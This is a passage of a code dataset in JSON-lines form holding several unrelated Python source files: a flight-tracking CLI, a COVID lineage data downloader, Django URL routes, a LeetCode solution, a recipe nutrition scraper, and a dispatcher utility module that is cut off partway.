in line:\n            data = line.replace(head, \"\").replace(tail, \"\")\n            break\n    \n    tab = []\n    try:\n        data = json.loads(data)\n    except:\n        exit(\"Flight data not found\")\n    \n    for key in data['flights']:\n        flight_id = key\n        break\n    \n    if \"INVALID\" in flight_id:\n        exit(\"Invalid flight number\")\n    \n    for track in data['flights'][flight_id]['track']:\n        ts = int(track['timestamp'])\n        timestamp = datetime.fromtimestamp(ts)\\\n            .strftime('%Y-%m-%d %H:%M:%S')\n        row = [\n            timestamp,\n            track['coord'][0],\n            track['coord'][1],\n            track['alt'],\n            track['gs']\n        ]\n        tab.append(row)\n    \n    if len(tab) < LIMIT:\n        print(tabulate(tab, headers=HEADERS))\n    else:\n        print(tabulate(tab[-LIMIT:], headers=HEADERS))\n", "repo_name": "mdminhazulhaque/flightaware-cli", "sub_path": "flightaware.py", "file_name": "flightaware.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 36, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "name"}, {"api_name": "tabulate.tabulate", "line_number": 87, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 89, "usage_type": "call"}]}
+{"seq_id": "73738133955", "text": "import argparse\nimport datetime\nimport logging\nimport pathlib\nimport shutil\n\nfrom . import task\nfrom . 
import util\n\ndef process_arguments():\n    parser = argparse.ArgumentParser(description='Download PANGO lineage dataset')\n\n    parser.add_argument('--s3-sync-dir', type=str, required=False,\n                        help='Override for directory to which to deposit the output files for sync')\n    parser.add_argument('--rclone-destination', type=str, default=None,\n                        help='If given, the `--s3-sync-dir` will be copied over to that destination with `rclone`.')\n\n    parser.add_argument('--endpoint-url', type=str, default=ENDPOINT,\n                        help='Override for the URL of the PANGO lineage data endpoint root.')\n    parser.add_argument('--duckdb-file', type=str, default='Covid19Datos-V2.duckdb',\n                        help='Override name of the DuckDB database file. Default: `Covid19Datos-V2.duckdb`.')\n    parser.add_argument('--rclone-command', type=str, default='rclone',\n                        help='Override the path to the rclone command. Default: `rclone`.')\n\n    return parser.parse_args()\n\nENDPOINT = 'https://raw.githubusercontent.com/cov-lineages/pango-designation/master'\n\ndef pango_lineages():\n    \"\"\"Entry point for PANGO lineages download code.\"\"\"\n    logging.basicConfig(\n        format='%(asctime)s %(threadName)s %(message)s',\n        level=logging.INFO)\n    util.log_platform()\n    args = process_arguments()\n\n    now = pick_and_log_now()\n    parquetfile = download_and_convert(args, now)\n\n    if args.s3_sync_dir:\n        move_to_sync_dir(args, parquetfile, now)\n\n    if args.rclone_destination:\n        task.rclone(\n            args.s3_sync_dir,\n            args.rclone_destination,\n            args.rclone_command)\n\ndef download_and_convert(args, now):\n    duck = util.make_duckdb_connection(\n        args.duckdb_file,\n        init=[\n            'INSTALL httpfs',\n            'LOAD httpfs'\n        ]\n    )\n    jinja = util.make_jinja('pango')\n    ts_format = '%Y-%m-%dT%H:%M:%SZ'\n    parquetfile = f'lineages_{now.strftime(ts_format)}.parquet'\n\n    template = jinja.get_template('lineages.sql.j2')\n    sql = template.render(\n        endpoint=args.endpoint_url,\n        output_parquet=parquetfile,\n        downloaded_at=now.isoformat()\n    )\n    with duck.cursor() as c:\n        c.execute(sql)\n\n    return parquetfile\n\ndef move_to_sync_dir(args, parquetfile, now):\n    logging.info(\"Moving files to sync dir %s...\", args.s3_sync_dir)\n    s3_sync_dir = pathlib.Path(args.s3_sync_dir)\n    s3_sync_dir.mkdir(exist_ok=True)\n    endpoint_dir = s3_sync_dir / 'pango'\n    endpoint_dir.mkdir(exist_ok=True)\n    dataset_dir = endpoint_dir / 'lineages'\n    dataset_dir.mkdir(exist_ok=True)\n\n    parquet_dir = dataset_dir / 'parquet_v1'\n    parquet_dir.mkdir(parents=True, exist_ok=True)\n    partition_dir = parquet_dir / f'downloaded_date={now.strftime(\"%Y-%m-%d\")}'\n    partition_dir.mkdir(exist_ok=True)\n    shutil.move(parquetfile, partition_dir)\n    logging.info(\"Moved %s to %s...\", parquetfile, partition_dir)\n\n\ndef pick_and_log_now():\n    now = datetime.datetime.utcnow()\n    logging.info('Now = %s', now.isoformat())\n    return now", "repo_name": "sacundim/covid-19-puerto-rico", "sub_path": "downloader/src/covid_19_puerto_rico_downloader/pango.py", "file_name": "pango.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 73, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 74, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 85, 
"usage_type": "call"}, {"api_name": "logging.info", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 90, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 90, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "4828220659", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('users//', views.user, name='user'),\n path('services//', views.service, name='service'),\n path('all///',\n views.user_service, name='user_service'),\n path('new', views.create, name='new_media_object'),\n]\n", "repo_name": "HanifCarroll/Media-Logger-Django", "sub_path": "media_logger_project/media_logger_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "70451724676", "text": "\"\"\"\n75. Sort Colors\n\"\"\"\n\nfrom typing import List\n\nclass Solution:\n def sortColors(self, nums: List[int]) -> None:\n b, m, e = 0, 0, len(nums)-1\n\n while m <= e:\n if b < m and nums[m] == 0:\n nums[m], nums[b] = nums[b], nums[m]\n b += 1\n elif nums[m] == 2:\n nums[m], nums[e] = nums[e], nums[m]\n e -= 1\n else:\n m += 1\n", "repo_name": "dictator-x/practise_as", "sub_path": "algorithm/leetCode/0075_sort_colors.py", "file_name": "0075_sort_colors.py", "file_ext": "py", "file_size_in_byte": 437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "13422843414", "text": "from bs4 import BeautifulSoup\nfrom urllib.request import urlopen, urlretrieve\nimport time\nimport re\nimport os\nimport csv\n\nurl = \"https://www.allrecipes.com/recipes/\"\npage_url = \"?page=\"\npages = 15\ncsv_file = './info.csv'\n## csv_directory = \"./dataset\"\n## image_directory = \"./dataset/images\"\n\n# check https://www.allrecipes.com/robots.txt\ncrawl_delay = 3\n\n# create csv file\nif os.path.isfile(csv_file) == False:\n with open(csv_file, 'w') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n filewriter.writerow(['Name', 'Calories', 'Serving Size', 'Fat(g)', 'Carbohydrate(g)', 'Protein(g)', 'Cholesterol(mg)', 'Sodium(mg)', 'Category', 'URL'])\n\nnames = []\nurls = {}\nitem = 0\n\nhtml = urlopen(url)\n\nsoup = BeautifulSoup(html, features=\"lxml\")\nfor tag in soup.find_all('a', {'href': re.compile('allrecipes.com/recipes')}):\n text = tag.get_text().lstrip()\n text = text.rstrip()\n if text not in urls.keys():\n # urls = {category: url}\n urls[text] = tag.get('href')\n\n\nfor category, link in urls.items():\n\n for page in range(pages):\n page += 1\n\n if page == 1:\n target_url = link\n else:\n target_url = link + page_url + str(page)\n\n print(\"PAGE: \" + str(page))\n print(\"URL: \" + target_url)\n print(\"\\n\")\n\n try:\n target_html = urlopen(target_url)\n soup = BeautifulSoup(target_html, features=\"lxml\")\n 
except:\n continue\n\n try:\n\n for tag in soup.find_all('article', {'class':['fixed-recipe-card', 'ng-isolate-scope']}):\n try:\n ## recipe_image = tag.find_all('img', {'class': 'fixed-recipe-card__img'})[0].get('data-original-src')\n\n recipe_url = tag.find_all('a', {'href': re.compile('allrecipes.com/recipe/')}, {'data-click-id': re.compile('card slot')})[0].get('href')\n recipe_html = urlopen(recipe_url)\n\n recipe_soup = BeautifulSoup(recipe_html, features=\"lxml\")\n\n name = recipe_soup.find_all('h1', {'class': 'recipe-summary__h1'})[0].get_text()\n name = name.replace('/', ' ')\n\n if name not in names:\n item += 1\n names.append(name)\n calories = recipe_soup.find_all('span', {'class': 'calorie-count'})[0].find_all('span')[0].get_text()\n calories = int(calories)\n serving_size = recipe_soup.find_all('meta', {'id': 'metaRecipeServings'})[0].get('content')\n\n nutrition = recipe_soup.find_all('div', {'class': \"nutrition-summary-facts\"})[0]\n fat = nutrition.find_all('span', {'itemprop': 'fatContent'})[0].get_text()\n carbohydrate = nutrition.find_all('span', {'itemprop': 'carbohydrateContent'})[0].get_text()\n protein = nutrition.find_all('span', {'itemprop': 'proteinContent'})[0].get_text()\n cholesterol = nutrition.find_all('span', {'itemprop': 'cholesterolContent'})[0].get_text()\n sodium = nutrition.find_all('span', {'itemprop': 'sodiumContent'})[0].get_text()\n nutrition = [fat, carbohydrate, protein, cholesterol, sodium]\n\n print(\"Item: \" + str(item))\n print(\"Name: \" + name)\n print(\"Calories: \" + str(calories))\n ## print(\"Image URL: \" + recipe_image)\n print(\"Serving Size: \" + serving_size)\n print(\"Fat: \" + fat + \"g\")\n print(\"Carbohydrate: \" + carbohydrate + \"g\")\n print(\"Protein: \" + protein + \"g\")\n print(\"Cholesterol: \" + cholesterol + \"mg\")\n print(\"Sodium: \" + sodium + \"mg\")\n print(\"Category: \" + category)\n print(\"URL: \" + recipe_url + \"\\n\")\n\n # save data\n with open(csv_file, 'a') as csvfile:\n filewriter = csv.writer(csvfile)\n filewriter.writerow(\n [name, str(calories), serving_size, fat, carbohydrate, protein, cholesterol, sodium, category, recipe_url])\n ## urlretrieve(recipe_image, image_directory + \"/\" + name)\n\n print(\"\\n\")\n except:\n continue\n\n time.sleep(crawl_delay)\n\n except:\n continue", "repo_name": "SamsonYuBaiJian/tracklah", "sub_path": "back-end/scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 4665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 28, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 55, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 66, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 68, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 103, "usage_type": 
"call"}, {"api_name": "time.sleep", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "4255242654", "text": "# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\"\"\" Dispatcher classes for handling methods dispatched for wrapped function calls.\n\nThis method allows classes to dispatch methods through other classes.\n\nHere is a small snippet showing how to utilize this module.\n\n\"\"\"\nimport logging\nfrom abc import ABCMeta, abstractmethod\nfrom collections import ChainMap, namedtuple\nfrom functools import update_wrapper\n\n__all__ = [\n \"AbstractDispatch\",\n \"ObjectDispatcher\",\n \"MethodDispatcher\",\n \"ErrorDispatcher\",\n \"ClassDispatcher\",\n \"TypeDispatcher\",\n]\n\n_log = logging.getLogger(\"sisl\")\n_log.info(f\"adding logger: {__name__}\")\n_log = logging.getLogger(__name__)\n\n\ndef _dict_to_str(name, d, parser=None):\n \"\"\"Convert a dict to __str__ representation\"\"\"\n if parser is None:\n\n def parser(kv):\n return f\" {kv[0]}: {kv[1]}\"\n\n d_str = \",\\n \".join(map(parser, d.items()))\n if len(d_str) > 0:\n return f\"{name} ({len(d)}): [\\n {d_str}\\n ]\"\n return \"\"\n\n\nclass AbstractDispatch(metaclass=ABCMeta):\n r\"\"\"Dispatcher class used for dispatching function calls\"\"\"\n\n def __init__(self, obj, **attrs):\n self._obj = obj\n # Local dictionary with attributes.\n # This could in principle contain anything.\n self._attrs = attrs\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (will not copy `obj`)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(self._obj, **self._attrs)\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(self._obj, **{**self._attrs, **attrs})\n\n def __call__(self, *args, **kwargs):\n _log.debug(f\"call {self.__class__.__name__}{args}\", extra={\"obj\": self})\n return self.dispatch(*args, **kwargs)\n\n def __str__(self):\n obj = str(self._obj).replace(\"\\n\", \"\\n \")\n attrs = _dict_to_str(\"attrs\", self._attrs)\n if len(attrs) == 0:\n return f\"{self.__class__.__name__}{{{obj}}}\"\n return f\"{self.__class__.__name__}{{{obj}, {attrs}\\n}}\"\n\n def __repr__(self):\n nattrs = len(self._attrs)\n return f\"<{self.__class__.__name__}{{{self._obj!r}, nattrs={nattrs}}}>\"\n\n def _get_object(self):\n \"\"\"Retrieves the object (self._obj) but also checks that the object is in fact an object (`type`)\n\n This will fail if the dispatch method has been called on the class (not an instance).\n \"\"\"\n obj = self._obj\n if isinstance(obj, type):\n raise ValueError(f\"Dispatcher on {obj} must not be called on the class.\")\n return obj\n\n def _get_class(self, allow_instance=False):\n \"\"\"Retrieves the object (self._obj) but also checks that the object is a class (not an instance, `type`)\n\n This will fail if the dispatch method has been called on an instance (not a class).\n \"\"\"\n obj = self._obj\n if isinstance(obj, type):\n return obj\n if allow_instance:\n return obj.__class__\n raise ValueError(f\"Dispatcher on {obj} must not be called on the instance.\")\n\n @abstractmethod\n def dispatch(self, method):\n \"\"\"Create dispatched method with correctly wrapped documentation\n\n This should return a 
function that mimics method but wraps it\n in some way.\n\n A basic interception would be\n\n .. code:: python\n @wraps(method)\n def func(*args, **kwargs):\n return method(*args, **kwargs)\n\n \"\"\"\n\n def __getattr__(self, key):\n attr = getattr(self._obj, key)\n if callable(attr):\n return self.dispatch(attr)\n return attr\n\n\nclass AbstractDispatcher(metaclass=ABCMeta):\n \"\"\"A container for dispatchers\n\n This is an abstract class holding the dispatch classes (`AbstractDispatch`)\n and the attributes that are associated with the dispatchers.\n \"\"\"\n\n def __init__(self, dispatchs=None, default=None, **attrs):\n if dispatchs is None:\n dispatchs = {}\n if not isinstance(dispatchs, ChainMap):\n dispatchs = ChainMap(dispatchs)\n # we will always use a chainmap to store the dispatches\n # We must not *copy*\n # It should be the same memory location in case we are\n # passing around the dispatch sequences\n self._dispatchs = dispatchs\n self._default = default\n self.__name__ = self.__class__.__name__\n # Attributes associated with the dispatcher\n self._attrs = attrs\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (making a new child for the dispatch lookup)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(self._dispatchs.new_child(), self._default, **self._attrs)\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(\n f\"renew {self.__class__.__name__}{tuple(attrs.keys())}\", extra={\"obj\": self}\n )\n return self.__class__(\n self._dispatchs, self._default, **{**self._attrs, **attrs}\n )\n\n def __len__(self):\n return len(self._dispatchs)\n\n def __repr__(self):\n ndispatchs = len(self._dispatchs)\n nattrs = len(self._attrs)\n return f\"<{self.__name__}{{ndispatchs={ndispatchs}, nattrs={nattrs}}}>\"\n\n def __str__(self):\n def toline(kv):\n k, v = kv\n v = str(v(\"\")).replace(\"\\n\", \"\\n \")\n if k == self._default:\n return f\"*{k} = {v}\"\n return f\" {k} = {v}\"\n\n dispatchs = _dict_to_str(\"dispatchs\", self._dispatchs, parser=toline)\n attrs = _dict_to_str(\"attrs\", self._attrs)\n if len(attrs) == 0:\n if len(self._dispatchs) == 0:\n return f\"{self.__name__}{{}}\"\n return f\"{self.__name__}{{{dispatchs}\\n}}\"\n return f\"{self.__name__}{{{dispatchs},\\n {attrs}\\n}}\"\n\n def __setitem__(self, key, dispatch):\n \"\"\"Registers a dispatch method (using `register` with default values)\n\n Parameters\n ----------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n \"\"\"\n self.register(key, dispatch)\n\n def __dir__(self):\n \"\"\"Return instances belonging to this object\"\"\"\n return list(self._dispatchs.keys()) + [\"renew\", \"register\"]\n\n def register(self, key, dispatch, default=False, overwrite=True):\n \"\"\"Register a dispatch class to this container\n\n Parameter\n ---------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n default : bool, optional\n if true, `dispatch` will be the default when requesting it\n overwrite : bool, optional\n if true and `key` already exists in the list of dispatchs, then\n it will be overwritten, otherwise a `LookupError` is raised.\n \"\"\"\n _log.info(\n f\"register {self.__class__.__name__}(key: {key})\", extra={\"obj\": self}\n )\n if key in 
self._dispatchs.maps[0] and not overwrite:\n raise LookupError(\n f\"{self.__class__.__name__} already has {key} registered (and overwrite is false)\"\n )\n self._dispatchs[key] = dispatch\n if default:\n self._default = key\n\n\nclass ErrorDispatcher(AbstractDispatcher):\n \"\"\"Faulty handler to ensure that certain operations are not allowed\n\n This may for instance be used with ``ClassDispatcher(instance_dispatcher=ErrorDispatcher)``\n to ensure that a certain dispatch attribute will never be called on an instance.\n It won't work on type_dispatcher due to not being able to call `register`.\n \"\"\"\n\n def __init__(self, obj, *args, **kwargs): # pylint: disable=W0231\n raise ValueError(\n f\"Dispatcher on {obj} must not be called in this way, see documentation.\"\n )\n\n\nclass MethodDispatcher(AbstractDispatcher):\n def __init__(self, method, dispatchs=None, default=None, obj=None, **attrs):\n super().__init__(dispatchs, default, **attrs)\n update_wrapper(self, method)\n\n # In python3 a method *always* have the __self__ key\n # In case the method is bound on a class.\n if obj is None:\n self._obj = getattr(method, \"__self__\", None)\n else:\n self._obj = obj\n\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (making a new child for the dispatch lookup)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self.__wrapped__,\n self._dispatchs.new_child(),\n self._default,\n self._obj,\n **self._attrs,\n )\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self.__wrapped__,\n self._dispatchs,\n self._default,\n self._obj,\n **{**self._attrs, **attrs},\n )\n\n def __call__(self, *args, **kwargs):\n _log.debug(f\"call {self.__class__.__name__}{args}\", extra={\"obj\": self})\n if self._default is None:\n return self.__wrapped__(*args, **kwargs)\n return self._dispatchs[self._default](self._obj, **self._attrs).dispatch(\n self.__wrapped__\n )(*args, **kwargs)\n\n def __getitem__(self, key):\n r\"\"\"Get method using dispatch according to `key`\"\"\"\n _log.debug(\n f\"__getitem__ {self.__class__.__name__},key={key}\", extra={\"obj\": self}\n )\n return self._dispatchs[key](self._obj, **self._attrs).dispatch(self.__wrapped__)\n\n __getattr__ = __getitem__\n\n\ndef _parse_obj_getattr(func):\n \"\"\"Parse `func` for all methods\"\"\"\n if func is None:\n # return common handler\n return getattr\n elif isinstance(func, str):\n # One can make getattr fail regardless of what to fetch from\n # the object\n if func == \"error\":\n\n def func(obj, key):\n raise AttributeError(\n f\"{obj} does not implement the '{key}' dispatcher, \"\n \"are you using it incorrectly?\"\n )\n\n return func\n raise NotImplementedError(\n f\"Defaulting the obj_getattr argument only accepts [error], got {func}.\"\n )\n return func\n\n\nclass ObjectDispatcher(AbstractDispatcher):\n \"\"\"A dispatcher relying on object lookups\n\n This dispatcher wraps a method call with lookup tables and possible defaults.\n\n Examples\n --------\n >>> a = ObjectDispatcher(lambda x: print(x))\n >>> class DoubleCall(AbstractDispatch):\n ... def dispatch(self, method):\n ... def func(x):\n ... method(x)\n ... method(x)\n ... 
return func\n >>> a.register(\"double\", DoubleCall)\n >>> a.double(\"hello world\")\n hello world\n hello world\n \"\"\"\n\n def __init__(\n self,\n obj,\n dispatchs=None,\n default=None,\n cls_attr_name=None,\n obj_getattr=None,\n **attrs,\n ):\n super().__init__(dispatchs, default, **attrs)\n self._obj = obj\n self._obj_getattr = _parse_obj_getattr(obj_getattr)\n self._cls_attr_name = cls_attr_name\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (making a new child for the dispatch lookup)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self._obj,\n dispatchs=self._dispatchs.new_child(),\n default=self._default,\n cls_attr_name=self._cls_attr_name,\n obj_getattr=self._obj_getattr,\n **self._attrs,\n )\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self._obj,\n dispatchs=self._dispatchs,\n default=self._default,\n cls_attr_name=self._cls_attr_name,\n obj_getattr=self._obj_getattr,\n **{**self._attrs, **attrs},\n )\n\n def __call__(self, **attrs):\n _log.debug(\n f\"call {self.__class__.__name__}{tuple(attrs.keys())}\", extra={\"obj\": self}\n )\n return self.renew(**attrs)\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}{{obj={self._obj!r}}}>\"\n\n def __str__(self):\n obj = str(self._obj).replace(\"\\n\", \"\\n \")\n # super() returns the super class, not the super-instance.\n # Hence we need to call the explicit function\n return super().__str__().replace(\"{\", f\"{{\\n {obj},\\n \", 1)\n\n def register(self, key, dispatch, default=False, overwrite=True, to_class=True):\n \"\"\"Register a dispatch class to this object and to the object class instance (if existing)\n\n Parameter\n ---------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n default : bool, optional\n this dispatch class will be the default on this object _only_.\n To register a class as the default class-wide, do this on the class\n variable.\n overwrite : bool, optional\n if true and `key` already exists in the list of dispatchs, then\n it will be overwritten, otherwise a `LookupError` is raised.\n to_class : bool, optional\n whether the dispatch class will also be registered with the\n contained object's class instance\n \"\"\"\n _log.info(\n f\"register {self.__class__.__name__}(key: {key})\", extra={\"obj\": self}\n )\n super().register(key, dispatch, default, overwrite)\n if to_class:\n cls_dispatch = getattr(self._obj.__class__, self._cls_attr_name, None)\n if isinstance(cls_dispatch, ClassDispatcher):\n cls_dispatch.register(key, dispatch, overwrite=overwrite)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def __getitem__(self, key):\n r\"\"\"Retrieve dispatched dispatchs by hash (allows functions to be dispatched)\"\"\"\n _log.info(\n f\"__getitem__ {self.__class__.__name__},key={key}\", extra={\"obj\": self}\n )\n return self._dispatchs[key](self._obj, **self._attrs)\n\n def __getattr__(self, key):\n \"\"\"Retrieve dispatched method by name, or if the name does not exist return a MethodDispatcher\"\"\"\n if key in self._dispatchs:\n _log.info(\n f\"__getattr__ {self.__class__.__name__},dispatch={key}\",\n extra={\"obj\": self},\n )\n return 
self._dispatchs[key](self._obj, **self._attrs)\n\n attr = self._obj_getattr(self._obj, key)\n if callable(attr):\n _log.info(\n f\"__getattr__ {self.__class__.__name__},method-dispatch={key}\",\n extra={\"obj\": self},\n )\n # This will also ensure that if the user calls immediately after it will use the default\n return MethodDispatcher(\n attr, self._dispatchs, self._default, self._obj, **self._attrs\n )\n _log.info(\n f\"__getattr__ {self.__class__.__name__},method={key}\", extra={\"obj\": self}\n )\n return attr\n\n\nclass TypeDispatcher(ObjectDispatcher):\n \"\"\"A dispatcher relying on type lookups\n\n This dispatcher may be called directly and will query the dispatch method\n through the type of the first argument.\n\n Examples\n --------\n >>> a = TypeDispatcher(\"a\")\n >>> class MyDispatch(AbstractDispatch):\n ... def dispatch(self, arg):\n ... print(arg)\n >>> a.register(str, MyDispatch)\n >>> a(\"hello world\")\n hello world\n \"\"\"\n\n def register(self, key, dispatch, default=False, overwrite=True, to_class=True):\n \"\"\"Register a dispatch class to this object and to the object class instance (if existing)\n\n Parameter\n ---------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n default : bool, optional\n this dispatch class will be the default on this object _only_.\n To register a class as the default class-wide, do this on the class\n variable.\n overwrite : bool, optional\n if true and `key` already exists in the list of dispatchs, then\n it will be overwritten, otherwise a `LookupError` is raised.\n to_class : bool, optional\n whether the dispatch class will also be registered with the\n contained object's class instance\n \"\"\"\n _log.info(\n f\"register {self.__class__.__name__}(key: {key})\", extra={\"obj\": self}\n )\n super().register(key, dispatch, default, overwrite, to_class=False)\n if to_class:\n cls_dispatch = getattr(self._obj, self._cls_attr_name, None)\n if isinstance(cls_dispatch, ClassDispatcher):\n cls_dispatch.register(key, dispatch, overwrite=overwrite)\n\n def __call__(self, obj, *args, **kwargs):\n # A call on a TypeDispatcher forces at least a single argument\n # where the type is being dispatched.\n\n # Figure out if obj is a class or not\n if isinstance(obj, type):\n typ = obj\n else:\n # If not, then get the type (basically same as obj.__class__)\n typ = type(obj)\n\n # if you want obj to be a type, then the dispatcher should control that\n _log.debug(f\"call {self.__class__.__name__}{args}\", extra={\"obj\": self})\n return self._dispatchs[typ](self._obj)(obj, *args, **kwargs)\n\n def __getitem__(self, key):\n r\"\"\"Retrieve dispatched dispatchs by hash (allows functions to be dispatched)\"\"\"\n _log.info(\n f\"__getitem__ {self.__class__.__name__},key={key}\", extra={\"obj\": self}\n )\n return self._dispatchs[key](self._obj, **self._attrs)\n\n\nclass ClassDispatcher(AbstractDispatcher):\n \"\"\"A dispatcher for classes, using `__get__` it converts into `ObjectDispatcher` upon invocation from an object, or a `TypeDispatcher` when invoked from a class\n\n This is a class-placeholder allowing a dispatcher to be a class attribute and converted into an\n `ObjectDispatcher` when invoked from an object.\n\n If it is called on the class, it will return a `TypeDispatcher`.\n\n This class should be an attribute of a class. 
It heavily relies on the `__get__` special\n    method.\n\n    Parameters\n    ----------\n    name : str\n       name of the attribute in the class\n    dispatchs : dict, optional\n       dictionary of dispatch methods\n    obj_getattr : callable, optional\n       method with 2 arguments, an ``obj`` and the ``attr`` which may be used\n       to control how the attribute is called.\n    instance_dispatcher : AbstractDispatcher, optional\n       control how instance dispatchers are handled through `__get__` method.\n       This controls the dispatcher used if called from an instance.\n    type_dispatcher : AbstractDispatcher, optional\n       control how class dispatchers are handled through `__get__` method.\n       This controls the dispatcher used if called from a class.\n\n    Examples\n    --------\n    >>> class A:\n    ...    new = ClassDispatcher(\"new\", obj_getattr=lambda obj, attr: getattr(obj.sub, attr))\n\n    The above defers any attributes to the contained `A.sub` attribute.\n    \"\"\"\n\n    def __init__(\n        self,\n        attr_name,\n        dispatchs=None,\n        default=None,\n        obj_getattr=None,\n        instance_dispatcher=ObjectDispatcher,\n        type_dispatcher=TypeDispatcher,\n        **attrs,\n    ):\n        # obj_getattr is necessary for the ObjectDispatcher to create the correct\n        # MethodDispatcher\n        super().__init__(dispatchs, default, **attrs)\n        # the name of the ClassDispatcher attribute in the class\n        self._attr_name = attr_name\n        p = namedtuple(\"get_class\", [\"instance\", \"type\"])\n        self._get = p(instance_dispatcher, type_dispatcher)\n\n        self._obj_getattr = _parse_obj_getattr(obj_getattr)\n        _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n    def copy(self):\n        \"\"\"Create a copy of this object (making a new child for the dispatch lookup)\"\"\"\n        _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n        return self.__class__(\n            self._attr_name,\n            self._dispatchs.new_child(),\n            self._default,\n            self._obj_getattr,\n            self._get.instance,\n            self._get.type,\n            **self._attrs,\n        )\n\n    def renew(self, **attrs):\n        \"\"\"Create a new class with updated attributes\"\"\"\n        _log.debug(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n        return self.__class__(\n            self._attr_name,\n            self._dispatchs,\n            self._default,\n            self._obj_getattr,\n            self._get.instance,\n            self._get.type,\n            